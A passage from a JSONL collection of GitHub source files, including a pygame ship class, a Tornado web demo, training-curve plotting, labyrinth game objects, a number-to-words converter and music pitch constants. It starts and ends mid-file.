self.moving_left and self.rect.left > self.screen_rect.left: #0 would also work\n self.center -= self.ai_settings.ship_speed_factor\n\n #update rect object form self.center.\n self.rect.centerx = self.center\n\n def blitme(self):\n \"\"\"Draws the ship at it's current location.\"\"\"\n self.screen.blit(self.image,self.rect)\n\n def center_ship(self):\n \"\"\"Center ship on the screen.\"\"\"\n self.center = self.screen_rect.centerx\n","repo_name":"PurpleRepublic/Python-Aliens-Game","sub_path":"ship.py","file_name":"ship.py","file_ext":"py","file_size_in_byte":1476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35706945182","text":"# 1、Tornado 基本使用\n# 2、html 文件映射\n# 3、模板路径配置 (html)\n# 4、静态文件配置 (js、css、图片等)\n# 5、添加post 接收提交参数\n# 6、向html传递参数\n# 7、使用模板语言\n# 8、模板语言\n# {{}}\n# {% if %} {% endif %}\n# 自定义模板语言'\n# 1. ui_methods\n# 2. 
ui_modules\n# 9、html 调用 Python 语言\n\n# 10、static_url MD5\n\n\nimport tornado.ioloop\nimport tornado.web\nimport uimethod as mt\nimport uimodule as md\n\nINPUTS_LIST = []\n\nclass MainHandler(tornado.web.RequestHandler):\n def get(self, *args, **kwargs):\n # 返回内容\n # self.write(\"Hello World!\")\n self.render('index.html', list=INPUTS_LIST)\n\n def post(self, *args, **kwargs):\n name = self.get_argument(\"name\")\n\n INPUTS_LIST.append(name)\n self.render('index.html', list=INPUTS_LIST)\n\n # self.write(\"哈哈😁\" + name)\n\n# 模板路径配置、静态文件配置\nsettings = {\n \"template_path\" : \"template\",\n \"static_path\" : \"static\",\n 'ui_methods': mt,\n 'ui_modules' : md,\n}\n\n#\n\n\n# 路由映射、模板路径配置\napplication = tornado.web.Application([\n (r\"/index\", MainHandler),\n], **settings)\n\nif __name__ == \"__main__\":\n application.listen(8000)\n tornado.ioloop.IOLoop.instance().start()","repo_name":"Jerrywx/Python_Down","sub_path":"04-Tornado/01-Hello Tornado/03-HelloWorld.py","file_name":"03-HelloWorld.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10215160340","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport json\nimport pdb\nimport sys\nimport seaborn as sns\nimport os\n\ndef get_json_list_data(data):\n '''\n Each list item is a dictionary of two keys 'loss' and 'acc'.\n '''\n assert(type(data) == type([]))\n plt.close('all')\n data_dict = {'acc': [], 'val_acc': [], 'loss': [], 'val_loss': []} \n for d in data:\n for k, v in data_dict.iteritems():\n if d.get(k, None):\n v.append(d[k])\n return data_dict\n\ndef plot_data(data, save_dir):\n if data.get('test_acc') is not None:\n plot_data_3(data, save_dir)\n else:\n plot_data_2(data, save_dir)\n\ndef plot_data_2(data, save_dir):\n '''\n data is a dictionary containing 'loss', 'acc', 'val_acc', 'val_loss'\n '''\n plt.close('all')\n plt.figure(figsize=(20,10))\n print(data.keys())\n\n # summarize history for accuracy\n plt.subplot(2,2,1)\n plt.plot(data['acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n # plt.legend(['train', 'test'], loc='upper left')\n plt.legend(['train'], loc='upper left')\n plt.subplot(2,2,2)\n plt.plot(data['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['val'], loc='upper left')\n\n # summarize history for loss\n plt.subplot(2, 2, 3)\n plt.plot(data['loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train'], loc='upper left')\n plt.subplot(2, 2, 4)\n plt.plot(data['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['validation'], loc='upper left')\n plt.savefig(save_dir + '/' + 'loss_hist.png')\n plt.show()\n\ndef plot_data_3(data, save_dir):\n plt.close('all')\n plt.figure(figsize=(20,10))\n\n # summarize history for accuracy\n plt.subplot(2,3,1)\n plt.plot(data['acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n # plt.legend(['train', 'test'], loc='upper left')\n plt.legend(['train'], loc='upper left')\n plt.subplot(2,3,2)\n plt.plot(data['val_acc'])\n plt.title('Val accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['val'], loc='upper left')\n plt.subplot(2,3,3)\n plt.plot(data['test_acc'])\n plt.title('Test accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['test'], loc='upper left')\n\n # summarize history for loss\n plt.subplot(2, 3, 4)\n 
plt.plot(data['loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train'], loc='upper left')\n plt.subplot(2, 3, 5)\n plt.plot(data['val_loss'])\n plt.title('Val loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['val'], loc='upper left')\n plt.subplot(2, 3, 6)\n plt.plot(data['test_loss'])\n plt.title('Test loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['test'], loc='upper left')\n plt.savefig(save_dir + '/' + 'loss_acc_hist.png')\n\n plt.show()\n\n\ndef main(json_file, save_dir):\n with open(json_file, 'r') as fp:\n data = json.load(fp)\n if type(data) == type({}):\n plot_data(data, save_dir)\n elif type(data) == type([]):\n plot_data(get_json_list_data(data), save_dir)\n else:\n assert(False)\n\nif __name__ == '__main__':\n assert(len(sys.argv) >= 2)\n json_file = sys.argv[1]\n save_dir = os.path.dirname(json_file)\n main(json_file, save_dir)\n\n","repo_name":"mohitsharma0690/multi_scale_head_gesture","sub_path":"utils/plot_loss_acc.py","file_name":"plot_loss_acc.py","file_ext":"py","file_size_in_byte":3525,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"36025360548","text":"from abc import ABCMeta, abstractmethod\nfrom typing import List\nimport random\n\nfrom game.interfaces.icellobject import ICellObject\nfrom game.implementations.labyrinth.cell import Cell\n\nclass BaseCellObject(ICellObject):\n def __init__(self, id: str):\n self.id = id\n self.cell = None\n\n def placeTo(self, cell: Cell):\n self.cell = cell\n\n def dump(self) -> dict:\n return {\n 'class': type(self).__name__,\n 'id': self.id,\n 'cell': [self.cell.x, self.cell.y]\n }\n\n @classmethod\n def load(cls, data: dict, cells: list):\n tr = cls(data['id'])\n tr.cell = cells[data['cell'][1]][data['cell'][0]]\n return tr\n\n\nclass Treasure(BaseCellObject):\n def activate(self, player, game):\n player.addObject(self)\n\n\nclass Wormhole(BaseCellObject):\n def __init__(self, id: str):\n super().__init__(id)\n self.toId = None\n\n def activate(self, player, game):\n to = game.labyrinth.getObjectById(self.toId)\n\n player.x = to.cell.x\n player.y = to.cell.y\n\n def dump(self) -> dict:\n data = super().dump()\n data['toId'] = self.toId\n return data\n\n @classmethod\n def load(cls, data, cells):\n obj = super().load(data, cells)\n obj.toId = data['toId']\n return obj\n\n\nclass WormholeFactory:\n @staticmethod\n def getRing(count: int) -> List[Wormhole]:\n objects = []\n for i in range(count):\n objects.append(Wormhole(\"W\" + str(i)))\n \n for i in range(count):\n objects[i].toId = objects[(i + 1) % count].id\n\n return objects\n\n\nclass River(BaseCellObject):\n def __init__(self, id: str):\n super().__init__(id)\n self.toId = None\n\n def activate(self, player, game):\n way_len = random.randint(0, 2)\n\n end = self\n for _ in range(way_len):\n if end.toId:\n end = game.labyrinth.getObjectById(end.toId)\n\n player.x = end.cell.x\n player.y = end.cell.y\n\n return way_len\n\n def dump(self) -> dict:\n data = super().dump()\n data['toId'] = self.toId\n return data\n\n @classmethod\n def load(cls, data, cells):\n obj = super().load(data, cells)\n obj.toId = data['toId']\n return obj\n\n\nclass RiverFactory:\n @staticmethod\n def getDirect(count: int) -> List[River]:\n objects = []\n for i in range(count):\n objects.append(River(\"R\" + str(i)))\n \n for i in range(count - 1):\n objects[i].toId = objects[i+1].id\n\n return objects\n\n @staticmethod\n def getWay(lenght: int, cell: Cell, cells: 
List) -> List[Cell]:\n variants = [[] for _ in range(4)]\n\n for i in range(lenght):\n if cell.y - i >= 0:\n variants[0].append(cells[cell.y - i][cell.x])\n if cell.x - i >= 0:\n variants[1].append(cells[cell.y][cell.x - i])\n if cell.y + i < len(cells):\n variants[2].append(cells[cell.y + i][cell.x])\n if cell.x + i < len(cells[cell.y]):\n variants[3].append(cells[cell.y][cell.x + i])\n\n variants = list(filter(lambda var: len(var) == lenght, variants))\n\n return random.choice(variants)\n","repo_name":"m-rodin/labyrinth_game","sub_path":"game/implementations/labyrinth/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9548879465","text":"from unittest.mock import Mock\n\nfrom pypubsub.base_publisher_subscriber.publisher import Publisher\n\n\ndef test_publish_should_dispatch_object_in_the_publishers_topic():\n # Given\n mock_topic = Mock()\n publisher = Publisher(mock_topic)\n object_to_send = \"Message\"\n\n # When\n publisher.publish(object_to_send)\n\n # Then\n mock_topic.dispatch.assert_called_once_with(object_to_send)\n","repo_name":"SamyAB/pypubsub","sub_path":"tests/test_base_publisher_subscriber/test_publisher.py","file_name":"test_publisher.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21573483505","text":"# 计算模型\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import norm\nfrom sklearn.neighbors import KernelDensity\n\narrayFilePath = \"../data/test3.txt\"\nvector = np.loadtxt(arrayFilePath, dtype=np.float32)\n\nprint(vector)\n\n# 归一化sigmod\ndef sigmoid(X,useStatus):\n if useStatus:\n return 1.0 / (1 + np.exp(-float(X)))\n else:\n return float(X)\n\n# 归一化 0~1的范围\n\ndef MaxMinNormalization(x,Max,Min):\n x = (x - Min) / (Max - Min)\n return x\n\n\nX_row=np.size(vector,0) #计算 X 一行元素的个数\nX_col=np.size(vector,1) #计算 X 一列元素的个数\n\n\n# 计算出每两个高维向量之间的距离\ndis = []\ndis2 = []\nfor i in range(X_row):\n vec1 = vector[i]\n for j in range(i+1,X_row):\n vec2 = vector[j]\n dis_c = np.sqrt(np.sum(np.square(vec1 - vec2)))\n dis_cs = sigmoid(dis_c,1)\n dis.append([dis_c])\n dis2.append(dis_cs)\n\nmaxValue = np.max(dis)\nminValue = np.min(dis)\n\n# dis3 = map(MaxMinNormalization(),dis,maxValue,minValue)\ndis3 = MaxMinNormalization(dis,maxValue,minValue)\n# print(dis)\nprint(dis3)\nprint(len(dis))\n# 标准差\nstdValue = np.std(dis3)\n\nprint(stdValue)\n\n\n# Plot all available kernels\nX_plot = np.linspace(-6, 6, 1000)[:, None]\nX_src = np.zeros((1, 1))\n\nfig, ax = plt.subplots(2, 3, sharex=True, sharey=True)\nfig.subplots_adjust(left=0.05, right=0.95, hspace=0.05, wspace=0.05)\n\n\ndef format_func(x, loc):\n if x == 0:\n return '0'\n elif x == 1:\n return 'h'\n elif x == -1:\n return '-h'\n else:\n return '%ih' % x\n\nfor i, kernel in enumerate(['gaussian', 'tophat', 'epanechnikov',\n 'exponential', 'linear', 'cosine']):\n axi = ax.ravel()[i]\n log_dens = KernelDensity(kernel=kernel).fit(X_src).score_samples(X_plot)\n axi.fill(X_plot[:, 0], np.exp(log_dens), '-k', fc='#AAAAFF')\n axi.text(-2.6, 0.95, kernel)\n\n axi.xaxis.set_major_formatter(plt.FuncFormatter(format_func))\n axi.xaxis.set_major_locator(plt.MultipleLocator(1))\n axi.yaxis.set_major_locator(plt.NullLocator())\n\n axi.set_ylim(0, 1.05)\n axi.set_xlim(-2.9, 2.9)\n\nax[0, 1].set_title('Available 
Kernels')\n\n#----------------------------------------------------------------------\n# Plot a 1D density example\nN = 100\nnp.random.seed(1)\nX = np.concatenate((np.random.normal(0, 1, 30),\n np.random.normal(5, 1, 70)))[:, np.newaxis]\n\nX = np.array(dis)\nN = len(dis)\n\nX = dis3\nmaxValue3 = np.max(dis3)\nminValue3 = np.min(dis3)\n\n# 创建等差数列 -5 到 10, 1000个数\nX_plot = np.linspace(minValue3-1, maxValue3+1, N)[:, np.newaxis]\n\n\n# 真实密度\ntrue_dens = (0.3 * norm(0, 1).pdf(X_plot[:, 0])\n + 0.7 * norm(5, 1).pdf(X_plot[:, 0]))\n\nfig, ax = plt.subplots()\nax.fill(X_plot[:, 0], true_dens, fc='black', alpha=0.2, label='input distribution')\n\n\n\n# 这里需要计算出一个合理的bandwidth\n# bandwidth约等于 1/N^(0.2) * stdValue\nbandwidth = 1/pow(N,0.2) * stdValue\n\nprint(\"bandwidth\")\nprint(bandwidth,N)\n# for kernel in ['gaussian', 'tophat', 'epanechnikov']:\nfor kernel in ['gaussian']:\n\n kde = KernelDensity(kernel=kernel, bandwidth=bandwidth).fit(X) # bandwidth=0.008\n log_dens = kde.score_samples(X_plot)\n exp_dens = np.exp(log_dens)\n ax.plot(X_plot[:, 0], np.exp(log_dens), '-',\n label=\"kernel = '{0}'\".format(kernel))\n\nax.text(6, 0.38, \"N={0} points\".format(N))\n\nax.legend(loc='upper left')\n\nax.plot(X[:, 0], -0.005 - 0.01 * np.random.random(X.shape[0]), '+k')\n\nax.set_xlim(minValue3, maxValue3)\nax.set_ylim(-0.02, 10)\n\nplt.show()\n\ndensity = np.exp(kde.score([[0.5]]))\n# 个性化访问概率\n# p = 1/N * 求和(kde.score)\n# 密度xbandwidth 计算出概率,这里有一定疑问\nprobability = density*bandwidth\nprint(probability)\n","repo_name":"DaLiWangCC/query_obfuscation","sub_path":"userQuery/kernelTest/calDistance.py","file_name":"calDistance.py","file_ext":"py","file_size_in_byte":3771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3585483091","text":"# 2022/11/30 Baek 15903\nimport heapq\n\nn, m = map(int, input().split())\ncards = list(map(int, input().split()))\nq = []\nfor card in cards:\n heapq.heappush(q, card)\n\nfor i in range(m):\n first = heapq.heappop(q)\n second = heapq.heappop(q)\n value = first + second\n for j in range(2):\n heapq.heappush(q, value)\n\nprint(sum(q))","repo_name":"kkw2758/Algorithm","sub_path":"Greedy/baek_15903.py","file_name":"baek_15903.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35718493360","text":"from equation import equation\nfrom re import search\n\n\ndef main(file_name):\n text = validator(file_name)\n\n if text:\n a, b, c = map(float, text.split())\n\n if a != 0:\n equation(a, b, c)\n else:\n print(\"a can't equal 0\")\n main(file_name)\n\n\ndef validator(file_name):\n pattern = r'^(-?\\d+(\\.\\d+)?\\s){2}-?\\d+(\\.\\d+)?\\n$'\n \n try:\n with open(file_name, 'r') as file:\n line = file.read()\n except FileNotFoundError:\n print(f'File {file_name} does not exist')\n return None\n\n matching = search(pattern, line)\n if matching:\n return matching.group()[:-1]\n else:\n print('Invalid file format')\n return None\n","repo_name":"lekoaa/mtrpz-lab1","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32475614964","text":"MSG_INFO = 'To convert an integer to uppercase enter it: '\nMSG_MODE = 'To select the language to transform the number into, enter en or ru: '\nMSG_ERROR = \"no integer was entered. 
You should enter an integer.\"\n\n\nclass NumberInWords:\n \"\"\"\n The main task of this class is to convert an integer to uppercase.\n \"\"\"\n numbers_en = {\n -1: 'minus',\n 0: 'zero',\n 1: 'one',\n 2: 'two',\n 3: 'three',\n 4: 'four',\n 5: 'five',\n 6: 'six',\n 7: 'seven',\n 8: 'eight',\n 9: 'nine',\n 10: 'ten',\n 11: 'eleven',\n 12: 'twelve',\n 13: 'thirteen',\n 14: 'fourteen',\n 15: 'fifteen',\n 16: 'sixteen',\n 17: 'seventeen',\n 18: 'eighteen',\n 19: 'nineteen',\n 20: 'twenty',\n 30: 'thirty',\n 40: 'forty',\n 50: 'fifty',\n 60: 'sixty',\n 70: 'seventy',\n 80: 'eighty',\n 90: 'ninety',\n 100: 'hundred'\n }\n triads_en = ['', 'thousand', 'million', 'billion', 'trillion',\n 'quadrillion', 'quintillion', 'sextillion']\n numbers_ru = {\n -1: 'минус',\n 0: 'ноль',\n 1: ('один', 'одна'),\n 2: ('два', 'две'),\n 3: 'три',\n 4: 'четыре',\n 5: 'пять',\n 6: 'шесть',\n 7: 'семь',\n 8: 'восем',\n 9: 'девять',\n 10: 'десять',\n 11: 'одинадцать',\n 12: 'двенадцать',\n 13: 'тринадцать',\n 14: 'четырнадцать',\n 15: 'пятнадцать',\n 16: 'шестнадцать',\n 17: 'семнадцать',\n 18: 'восемнадцать',\n 19: 'девятнадцать',\n 20: 'двадцать',\n 30: 'тридцать',\n 40: 'сорок',\n 50: 'пятьдесят',\n 60: 'шестьдесят',\n 70: 'семьдесят',\n 80: 'восемьдесят',\n 90: 'девяносто',\n 100: 'сто',\n 200: 'двести',\n 300: 'триста',\n 400: 'четыреста',\n 500: 'пятьсот',\n 600: 'шестьсот',\n 700: 'семьсот',\n 800: 'восемьсот',\n 900: 'девятьсот',\n }\n triads_ru = ['', ('тысяча', 'тысячи', 'тысяч'), ('миллион', 'миллиона', 'миллионов'),\n ('биллион', 'биллиона', 'биллионов'), ('триллион', 'триллиона', 'триллионов'),\n ('квадрилион', 'квадрилиона', 'квадрилионов'), ('квантилион', 'квантилиона', 'квантилионов'),\n ('секстилион', 'секстилиона', 'секстилионов')]\n\n def __init__(self, number=0, mode='ru'):\n self.mode = mode\n self.number = number\n if self.mode == 'en':\n self.numbers, self.triads = self.numbers_en, self.triads_en\n else:\n self.numbers, self.triads = self.numbers_ru, self.triads_ru\n\n # get hundreds in words\n def generate_hundred_in_words(self, rank_value):\n hundreds_value = rank_value // 100\n if hundreds_value == 0:\n return ''\n if self.mode == 'en':\n hundreds = self.numbers[hundreds_value], self.numbers[100]\n return ' '.join(hundreds)\n if self.mode == 'ru':\n return self.numbers[hundreds_value * 100]\n\n # get list of ranks\n def get_ranks(self):\n value = abs(self.number)\n ranks = []\n while value / 1000 > 1:\n rank_value = value % 1000\n ranks.append(rank_value)\n value = value // 1000\n ranks.append(value)\n ranks.reverse()\n return ranks\n\n # get tens and units in words\n def generate_units_in_words(self, rank_value):\n units = rank_value % 100\n if units != 0:\n if units < 21:\n if self.mode == 'ru' and (units == 1 or units == 2):\n return self.numbers[units][0]\n else:\n return self.numbers[units]\n else:\n words = [self.numbers[units // 10 * 10]]\n units = units % 10\n if units != 0:\n if self.mode == 'ru' and (units == 1 or units == 2):\n words.append(self.numbers[units][0])\n else:\n words.append(self.numbers[units])\n return ' '.join(words)\n return ''\n\n # modified str method to convert an integer to uppercase\n def __repr__(self):\n if self.number == 0:\n return self.numbers[0]\n number_in_words = []\n if self.number < 0:\n number_in_words.append(self.numbers[-1])\n ranks = self.get_ranks()\n number_of_ranks = len(ranks)\n for item in range(number_of_ranks):\n hundreds = self.generate_hundred_in_words(ranks[item])\n if hundreds != '':\n number_in_words.append(hundreds)\n units = 
self.generate_units_in_words(ranks[item])\n if units != '':\n number_in_words.append(units)\n triad = self.generate_triad_in_words(number_of_ranks, item, ranks)\n if triad != '':\n number_in_words.append(triad)\n numeric_line = ' '.join(number_in_words)\n return numeric_line\n\n # get rank in words\n def generate_triad_in_words(self, number_of_ranks, item, ranks):\n triad = self.triads[number_of_ranks - 1 - item]\n if ranks[item] == 0:\n return ''\n if triad != '':\n if self.mode == 'en':\n return triad\n else:\n triad_word = ranks[item] % 10\n if triad_word == 0 or triad_word > 4:\n triad_word = 2\n elif triad_word != 1:\n triad_word = 1\n return triad[triad_word]\n return ''\n\n\ndef main():\n try:\n number = int(input(MSG_INFO))\n mode = str(input(MSG_MODE))\n if mode in ['en', 'ru']:\n print(NumberInWords(number, mode))\n else:\n print(NumberInWords(number))\n except ValueError:\n print(MSG_ERROR)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"evroandrew/python_tasks","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4493005788","text":"from cmat.basic import natural,sharp,flat,Pitch\nfrom cmat.quality import double\n\nC0 = Pitch(1,0,None)\nCn0 = Pitch(1,0,natural)\nCs0 = Pitch(1,0,sharp)\nCx0 = Pitch(1,0,double/sharp)\nCb0 = Pitch(1,0,flat)\nCbb0 = Pitch(1,0,double/flat)\n\nD0 = Pitch(2,0,None)\nDn0 = Pitch(2,0,natural)\nDs0 = Pitch(2,0,sharp)\nDx0 = Pitch(2,0,double/sharp)\nDb0 = Pitch(2,0,flat)\nDbb0 = Pitch(2,0,double/flat)\n\nE0 = Pitch(3,0,None)\nEn0 = Pitch(3,0,natural)\nEs0 = Pitch(3,0,sharp)\nEx0 = Pitch(3,0,double/sharp)\nEb0 = Pitch(3,0,flat)\nEbb0 = Pitch(3,0,double/flat)\n\nF0 = Pitch(4,0,None)\nFn0 = Pitch(4,0,natural)\nFs0 = Pitch(4,0,sharp)\nFx0 = Pitch(4,0,double/sharp)\nFb0 = Pitch(4,0,flat)\nFbb0 = Pitch(4,0,double/flat)\n\nG0 = Pitch(5,0,None)\nGn0 = Pitch(5,0,natural)\nGs0 = Pitch(5,0,sharp)\nGx0 = Pitch(5,0,double/sharp)\nGb0 = Pitch(5,0,flat)\nGbb0 = Pitch(5,0,double/flat)\n\nA0 = Pitch(6,0,None)\nAn0 = Pitch(6,0,natural)\nAs0 = Pitch(6,0,sharp)\nAx0 = Pitch(6,0,double/sharp)\nAb0 = Pitch(6,0,flat)\nAbb0 = Pitch(6,0,double/flat)\n\nB0 = Pitch(7,0,None)\nBn0 = Pitch(7,0,natural)\nBs0 = Pitch(7,0,sharp)\nBx0 = Pitch(7,0,double/sharp)\nBb0 = Pitch(7,0,flat)\nBbb0 = Pitch(7,0,double/flat)\n\nC1 = Pitch(1,1,None)\nCn1 = Pitch(1,1,natural)\nCs1 = Pitch(1,1,sharp)\nCx1 = Pitch(1,1,double/sharp)\nCb1 = Pitch(1,1,flat)\nCbb1 = Pitch(1,1,double/flat)\n\nD1 = Pitch(2,1,None)\nDn1 = Pitch(2,1,natural)\nDs1 = Pitch(2,1,sharp)\nDx1 = Pitch(2,1,double/sharp)\nDb1 = Pitch(2,1,flat)\nDbb1 = Pitch(2,1,double/flat)\n\nE1 = Pitch(3,1,None)\nEn1 = Pitch(3,1,natural)\nEs1 = Pitch(3,1,sharp)\nEx1 = Pitch(3,1,double/sharp)\nEb1 = Pitch(3,1,flat)\nEbb1 = Pitch(3,1,double/flat)\n\nF1 = Pitch(4,1,None)\nFn1 = Pitch(4,1,natural)\nFs1 = Pitch(4,1,sharp)\nFx1 = Pitch(4,1,double/sharp)\nFb1 = Pitch(4,1,flat)\nFbb1 = Pitch(4,1,double/flat)\n\nG1 = Pitch(5,1,None)\nGn1 = Pitch(5,1,natural)\nGs1 = Pitch(5,1,sharp)\nGx1 = Pitch(5,1,double/sharp)\nGb1 = Pitch(5,1,flat)\nGbb1 = Pitch(5,1,double/flat)\n\nA1 = Pitch(6,1,None)\nAn1 = Pitch(6,1,natural)\nAs1 = Pitch(6,1,sharp)\nAx1 = Pitch(6,1,double/sharp)\nAb1 = Pitch(6,1,flat)\nAbb1 = Pitch(6,1,double/flat)\n\nB1 = Pitch(7,1,None)\nBn1 = Pitch(7,1,natural)\nBs1 = Pitch(7,1,sharp)\nBx1 = Pitch(7,1,double/sharp)\nBb1 = Pitch(7,1,flat)\nBbb1 = Pitch(7,1,double/flat)\n\nC2 = Pitch(1,2,None)\nCn2 = 
Pitch(1,2,natural)\nCs2 = Pitch(1,2,sharp)\nCx2 = Pitch(1,2,double/sharp)\nCb2 = Pitch(1,2,flat)\nCbb2 = Pitch(1,2,double/flat)\n\nD2 = Pitch(2,2,None)\nDn2 = Pitch(2,2,natural)\nDs2 = Pitch(2,2,sharp)\nDx2 = Pitch(2,2,double/sharp)\nDb2 = Pitch(2,2,flat)\nDbb2 = Pitch(2,2,double/flat)\n\nE2 = Pitch(3,2,None)\nEn2 = Pitch(3,2,natural)\nEs2 = Pitch(3,2,sharp)\nEx2 = Pitch(3,2,double/sharp)\nEb2 = Pitch(3,2,flat)\nEbb2 = Pitch(3,2,double/flat)\n\nF2 = Pitch(4,2,None)\nFn2 = Pitch(4,2,natural)\nFs2 = Pitch(4,2,sharp)\nFx2 = Pitch(4,2,double/sharp)\nFb2 = Pitch(4,2,flat)\nFbb2 = Pitch(4,2,double/flat)\n\nG2 = Pitch(5,2,None)\nGn2 = Pitch(5,2,natural)\nGs2 = Pitch(5,2,sharp)\nGx2 = Pitch(5,2,double/sharp)\nGb2 = Pitch(5,2,flat)\nGbb2 = Pitch(5,2,double/flat)\n\nA2 = Pitch(6,2,None)\nAn2 = Pitch(6,2,natural)\nAs2 = Pitch(6,2,sharp)\nAx2 = Pitch(6,2,double/sharp)\nAb2 = Pitch(6,2,flat)\nAbb2 = Pitch(6,2,double/flat)\n\nB2 = Pitch(7,2,None)\nBn2 = Pitch(7,2,natural)\nBs2 = Pitch(7,2,sharp)\nBx2 = Pitch(7,2,double/sharp)\nBb2 = Pitch(7,2,flat)\nBbb2 = Pitch(7,2,double/flat)\n\nC3 = Pitch(1,3,None)\nCn3 = Pitch(1,3,natural)\nCs3 = Pitch(1,3,sharp)\nCx3 = Pitch(1,3,double/sharp)\nCb3 = Pitch(1,3,flat)\nCbb3 = Pitch(1,3,double/flat)\n\nD3 = Pitch(2,3,None)\nDn3 = Pitch(2,3,natural)\nDs3 = Pitch(2,3,sharp)\nDx3 = Pitch(2,3,double/sharp)\nDb3 = Pitch(2,3,flat)\nDbb3 = Pitch(2,3,double/flat)\n\nE3 = Pitch(3,3,None)\nEn3 = Pitch(3,3,natural)\nEs3 = Pitch(3,3,sharp)\nEx3 = Pitch(3,3,double/sharp)\nEb3 = Pitch(3,3,flat)\nEbb3 = Pitch(3,3,double/flat)\n\nF3 = Pitch(4,3,None)\nFn3 = Pitch(4,3,natural)\nFs3 = Pitch(4,3,sharp)\nFx3 = Pitch(4,3,double/sharp)\nFb3 = Pitch(4,3,flat)\nFbb3 = Pitch(4,3,double/flat)\n\nG3 = Pitch(5,3,None)\nGn3 = Pitch(5,3,natural)\nGs3 = Pitch(5,3,sharp)\nGx3 = Pitch(5,3,double/sharp)\nGb3 = Pitch(5,3,flat)\nGbb3 = Pitch(5,3,double/flat)\n\nA3 = Pitch(6,3,None)\nAn3 = Pitch(6,3,natural)\nAs3 = Pitch(6,3,sharp)\nAx3 = Pitch(6,3,double/sharp)\nAb3 = Pitch(6,3,flat)\nAbb3 = Pitch(6,3,double/flat)\n\nB3 = Pitch(7,3,None)\nBn3 = Pitch(7,3,natural)\nBs3 = Pitch(7,3,sharp)\nBx3 = Pitch(7,3,double/sharp)\nBb3 = Pitch(7,3,flat)\nBbb3 = Pitch(7,3,double/flat)\n\nC4 = Pitch(1,4,None)\nCn4 = Pitch(1,4,natural)\nCs4 = Pitch(1,4,sharp)\nCx4 = Pitch(1,4,double/sharp)\nCb4 = Pitch(1,4,flat)\nCbb4 = Pitch(1,4,double/flat)\n\nD4 = Pitch(2,4,None)\nDn4 = Pitch(2,4,natural)\nDs4 = Pitch(2,4,sharp)\nDx4 = Pitch(2,4,double/sharp)\nDb4 = Pitch(2,4,flat)\nDbb4 = Pitch(2,4,double/flat)\n\nE4 = Pitch(3,4,None)\nEn4 = Pitch(3,4,natural)\nEs4 = Pitch(3,4,sharp)\nEx4 = Pitch(3,4,double/sharp)\nEb4 = Pitch(3,4,flat)\nEbb4 = Pitch(3,4,double/flat)\n\nF4 = Pitch(4,4,None)\nFn4 = Pitch(4,4,natural)\nFs4 = Pitch(4,4,sharp)\nFx4 = Pitch(4,4,double/sharp)\nFb4 = Pitch(4,4,flat)\nFbb4 = Pitch(4,4,double/flat)\n\nG4 = Pitch(5,4,None)\nGn4 = Pitch(5,4,natural)\nGs4 = Pitch(5,4,sharp)\nGx4 = Pitch(5,4,double/sharp)\nGb4 = Pitch(5,4,flat)\nGbb4 = Pitch(5,4,double/flat)\n\nA4 = Pitch(6,4,None)\nAn4 = Pitch(6,4,natural)\nAs4 = Pitch(6,4,sharp)\nAx4 = Pitch(6,4,double/sharp)\nAb4 = Pitch(6,4,flat)\nAbb4 = Pitch(6,4,double/flat)\n\nB4 = Pitch(7,4,None)\nBn4 = Pitch(7,4,natural)\nBs4 = Pitch(7,4,sharp)\nBx4 = Pitch(7,4,double/sharp)\nBb4 = Pitch(7,4,flat)\nBbb4 = Pitch(7,4,double/flat)\n\nC5 = Pitch(1,5,None)\nCn5 = Pitch(1,5,natural)\nCs5 = Pitch(1,5,sharp)\nCx5 = Pitch(1,5,double/sharp)\nCb5 = Pitch(1,5,flat)\nCbb5 = Pitch(1,5,double/flat)\n\nD5 = Pitch(2,5,None)\nDn5 = Pitch(2,5,natural)\nDs5 = Pitch(2,5,sharp)\nDx5 = Pitch(2,5,double/sharp)\nDb5 = Pitch(2,5,flat)\nDbb5 = Pitch(2,5,double/flat)\n\nE5 = Pitch(3,5,None)\nEn5 = Pitch(3,5,natural)\nEs5 = Pitch(3,5,sharp)\nEx5 = Pitch(3,5,double/sharp)\nEb5 = Pitch(3,5,flat)\nEbb5 = Pitch(3,5,double/flat)\n\nF5 = Pitch(4,5,None)\nFn5 = Pitch(4,5,natural)\nFs5 = Pitch(4,5,sharp)\nFx5 = Pitch(4,5,double/sharp)\nFb5 